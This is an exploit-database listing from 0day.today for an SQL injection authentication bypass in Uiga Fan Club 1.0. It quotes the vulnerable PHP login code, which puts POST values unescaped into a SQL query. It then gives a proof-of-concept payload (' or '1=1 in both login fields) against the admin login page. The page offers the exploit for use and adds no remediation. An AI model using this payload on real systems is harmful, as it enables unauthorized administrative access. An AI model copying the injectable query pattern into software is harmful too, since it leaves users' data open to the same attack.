[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability

Author
cr4wl3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11118
Category
web applications
Date add
27-02-2010
Platform
unsorted
==============================================================
Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
==============================================================

# Uiga Fan Club <= 1.0 (Auth Bypass) SQL Injection Vulnerability
###########################################################################
# Author: cr4wl3r
# Download: http://www.scriptdevelopers.net/download/uigafanclub.zip
###########################################################################
#if (isset($_POST['admin_name']))
# {
# $admin_name=$_POST['admin_name'];
# $admin_password=$_POST['admin_password'];
#
#
# if(empty($admin_name))
# {
# $errorMessage=warning." Username is empty!";
# }
# elseif(empty($admin_password))
# {
# $errorMessage=warning." Password is empty!";
# }
#
#
# else
# {
# $sql="SELECT *
#      FROM admin
#      WHERE admin_name='$admin_name' and admin_password='$admin_password'";
#
###########################################################################
 
###############################################
PoC: [path]/admin/admin_login.php
 
     Username: ' or '1=1
     password: ' or '1=1
###############################################



#  0day.today [2024-11-14]  #